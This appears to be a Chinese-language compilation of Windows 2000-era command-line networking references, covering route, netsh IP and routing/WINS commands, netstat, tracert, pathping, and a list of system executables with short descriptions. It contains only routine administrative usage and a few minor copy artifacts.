在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。 命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如, 10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10. 开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10. 开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址
Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的):
C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.1.1.94 (本地连接更改之前的ip)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
C:\>netsh (进入设置模式)
netsh>interface
interface>ip
interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
上文中的set命令具体解释如下:
set address - 设置指定的接口的 IP 地址和默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
网络常用命令:
IPCONFIG
C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .
IP Address. . . . . . . . . . . . : 10.1.1.111
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.1.1.254
命令一览
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
快速切换IP地址有绝招
在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换?
答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息:
C:\Documents and Settings\Administrator>netsh
netsh>
netsh>int ip
interface ip>dump
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定)
set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0
set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1
set dns name = ″本地连接″ source = static addr = 61.237.17.181
add dns name = ″本地连接″ addr = 211.97.168.129
add dns name = ″本地连接″ addr = 211.98.4.1
set wins name = ″本地连接″ source = static addr = none
# ″本地连接 2″ 的接口 IP 配置
set address name = ″本地连接 2″ source = dhcp
set dns name = ″本地连接 2″ source = dhcp
set wins name = ″本地连接 2″ source = dhcp
popd
# 接口 IP 配置结束
快速切换IP地址有绝招 2
现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。
到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作:
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0
确认更改。
interface ip>exit
再用ipconfig命令核实一下:
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2
Media State . . . . . . . . . . . Cable Disconnected
Ethernet adapter 本地连接
Connection-specific DNS Suffix .
IP Address. . . . . . . . . . . . 192.168.0.7
Subnet Mask . . . . . . . . . . . 255.255.255.0
Default Gateway . . . . . . . . . 192.168.0.2
从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容: int ip
set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0
然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。
最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息:
int ip
set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0
set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1
同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换?
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。
-d 指定不将IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。
pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。
在命令提示符下交互使用 DHCP 命令
打开 命令提示符。
键入 netsh。
在 netsh>(Netshell) 命令提示行键入"dhcp"。
在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。
一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问"
一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。 键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show r***estinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /?
delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /?
init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /?
init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /?
set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /?
set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /?
set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /?
show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /?
show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /?
show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名。
Win2000命令全集
accwiz.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导
acsetups.exe > ACS setup DCOM server executable
actmovie.exe > Direct Show setup tool 直接显示安装工具
append.exe > Allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据
arp.exe > NETWORK Display and modify IP - Hardware addresses 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe > AT is a scheduling utility also included with UNIX 计划运行任务
atmadm.exe > Displays statistics for ATM call manager. ATM调用管理器统计
attrib.exe > Display and modify attributes for files and folders 显示和更改文件和文件夹属性
autochk.exe > Used to check and repair Windows File Systems 检测修复文件系统
autoconv.exe > Automates the file system conversion during reboots 在启动过程中自动转化系统
autofmt.exe > Automates the file format process during reboots 在启动过程中格式化进程
autolfn.exe > Used for formatting long file names 使用长文件名格式
bootok.exe > Boot acceptance application for registry bootvrfy.exe > Bootvrfy.exe, a program included in Windows 2000 that notifies the system that startup was successful. Bootvrfy.exe can be run on a local or remote computer. 通报启动成功
cacls.exe > Displays or modifies access control lists (ACLs) of files. 显示和编辑ACL
calc.exe > Windows Calculators 计算器
cdplayer.exe > Windows CD Player CD播放器
change.exe > Change { User | Port | Logon } 与终端服务器相关的查询
charmap.exe > Character Map 字符映射表
chglogon.exe > Same as using "Change Logon" 启动或停用会话记录
chgport.exe > Same as using "Change Port" 改变端口(终端服务)
chgusr.exe > Same as using "Change User" 改变用户(终端服务)
chkdsk.exe > Check the hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter 磁盘检测程序
chkntfs.exe > Same as using chkdsk but for NTFS NTFS磁盘检测程序
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
cipher.exe > Displays or alters the encryption of directories [files] on NTFS partitions. 在NTFS上显示或改变加密的文件或目录
cisvc.exe > Content Index -- It's the content indexing service for I 索引内容
ckcnv.exe > Cookie Convertor 变换Cookie
cleanmgr.exe > Disk Cleanup, popular with Windows 98 磁盘清理
cliconfg.exe > SQL Server Client Network Utility SQL客户网络工具 clipbrd.exe > Clipboard viewer for Local will allow you to connect to other clipboards 剪贴簿查看
clipsrv.exe > Start the clipboard Server 运行Clipboard服务
clspack.exe > CLSPACK used to create a file listing of system packages 建立系统文件列表清
cluster.exe > Display a cluster in a domain 显示域的集群
_cmd_.exe > Famous command prompt 没什么好说的!
cmdl32.exe > Connection Manager Auto-Download 自动下载连接管理
cmmgr32.exe > Connection Manager 连接管理器
cmmon32.exe > Connection Manager Monitor 连接管理器监视
cmstp.exe > Connection Manager Profile Manager 连接管理器配置文件安装程序
comclust.exe > about cluster server 集群
comp.exe > ComClust Add, Remove, or Join a cluster. 比较两个文件和文件集的内容*
compact.exe > Displays or alters the compression of files on NTFS partitions. 显示或改变NTFS分区上文件的压缩状态
conime.exe > Console IME IME控制台
control.exe > Starts the control panel 控制面板
convert.exe > Convert File System to NTFS 转换文件系统到NTFS
convlog.exe > Converts MS IIS log files 转换IIS日志文件格式到NCSA格式
cprofile.exe > Copy profiles 转换显示模式
cscript.exe > MS Windows Scripts Host Version 5.1 较本宿主版本
csrss.exe > Client Server Runtime Process 客户服务器Runtime进程
csvde.exe > Comma Separated Variable Import/Export Utility 日至格式转换程序
dbgtrace.exe > 和Terminal Server相关
dcomcnfg.exe > Display the current DCOM configuration. DCOM配置属性
dcphelp.exe > ?
dcpromo.exe > Promote a domain controller to ADSI AD安装向导
ddeshare.exe > Display DDE shares on local or remote computer DDE共享
ddmprxy.exe >
debug.exe > Runs Debug, a program testing and editing tool. 就是DEBUG啦!
dfrgfat.exe > Defrag FAT file system FAT分区磁盘碎片整理程序
dfrgntfs.exe > Defrag NTFS file system NTFS分区磁盘碎片整理程序
dfs_cmd_.exe > configures a Dfs tree 配置一个DFS树
dfsinit.exe > Distributed File System Initialization 分布式文件系统初始化
dfssvc.exe > Distributed File System Server 分布式文件系统服务器
diantz.exe > MS Cabinet Maker 制作CAB文件
diskperf.exe > Starts physical Disk Performance counters 磁盘性能计数器
dllhost.exe > dllhost is used on all versions of Windows 2000. dllhost is the hedost process for all COM+ applications. 所有COM+应用软件的主进程
dllhst3g.exe >
网络常用命令:
dmadmin.exe > Disk Manager Service 磁盘管理服务
dmremote.exe > Part of disk management 磁盘管理服务的一部分
dns.exe > DNS Applications DNS
doskey.exe > recalls Windows command lines and creates macros 命令行创建宏
dosx.exe > DOS Extender DOS扩展
dplaysvr.exe > Direct Play Helper 直接运行帮助
drwatson.exe > Dr Watson for 2000 Fault Detector 华生医生错误检测
drwtsn32.exe > Dr Watson for 2000 viewer and configuration manager 华生医生显示和配置管理
dtcsetup.exe > Installs MDTC
dvdplay.exe > Windows 2000 DVD player DVD播放
dxdiag.exe > Direct-X Diagnostics Direct-X诊断工具
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
esentutl.exe > MS Database Utility MS数据库工具
eudcedit.exe > Private character editor Ture Type造字程序
eventvwr.exe > Windows 2000 Event Viewer 事件查看器
evnt_cmd_.exe > Event to trap translator; Configuration tool
evntwin.exe > Event to trap translator setup
exe2bin.exe > Converts EXE to binary format 转换EXE文件到二进制
expand.exe > Expand Files that have been compressed 解压缩
extrac32.exe > CAB File extraction utility 解CAB工具
fastopen.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件
faxcover.exe > Fax Cover page editor 传真封面编辑
faxqueue.exe > Display Fax Queue 显示传真队列
faxsend.exe > Fax Wizard for sending faxes 发送传真向导
faxsvc.exe > Starts fax server 启动传真服务
fc.exe > Compares two files or sets of files and their differences 比较两个文件的不同
find.exe > Searches for a text string in file or files 查找文件中的文本行
findstr.exe > Searches for strings in files 查找文件中的行
finger.exe > Fingers a user and displays statistics on that user Finger一个用户并显示出统计结果
fixmapi.exe > Fix mapi files 修复MAPI文件
flattemp.exe > Enable or disable temporally directories 允许或者禁用临时文件目录
fontview.exe > Display fonts in a font file 显示字体文件中的字体
forcedos.exe > Forces a file to start in dos mode. 强制文件在DOS模式下运行
freecell.exe > Popular Windows Game 空当接龙
ftp.exe > File Transfer Protocol used to transfer files over a network connection 就是FTP了
gdi.exe > Graphic Device Interface 图形界面驱动
grovel.exe >
grpconv.exe > Program Manager Group Convertor 转换程序管理员组
help.exe > displays help for Windows 2000 commands 显示帮助
hostname.exe > Display hostname for machine. 显示机器的Hostname
ie4uinit.exe > IE5 User Install tool IE5用户安装工具
ieshwiz.exe > Customize folder wizard 自定义文件夹向导
iexpress.exe > Create and setup packages for install 穿件安装包
iisreset.exe > Restart IIS Admin Service 重启IIS服务
internat.exe > Keyboard Language Indicator Applet 键盘语言指示器
ipconfig.exe > Windows 2000 IP configuration. 察看IP配置
ipsecmon.exe > IP Security Monitor IP安全监视器
ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路由控制程序
irftp.exe > Setup FTP for wireless communication 无线连接
ismserv.exe > Intersite messaging Service 安装或者删除Service Control Manager中的服务
jdbgmgr.exe > Microsoft debugger for java 4 Java4的调试器
jetconv.exe > Convert a Jet Engine Database 转换Jet Engine数据库
jetpack.exe > Compact Jet Database. 压缩Jet数据库
jview.exe > Command-line loader for Java Java的命令行装载者
krnl386.exe > Core Component for Windows 2000 2000的核心组件
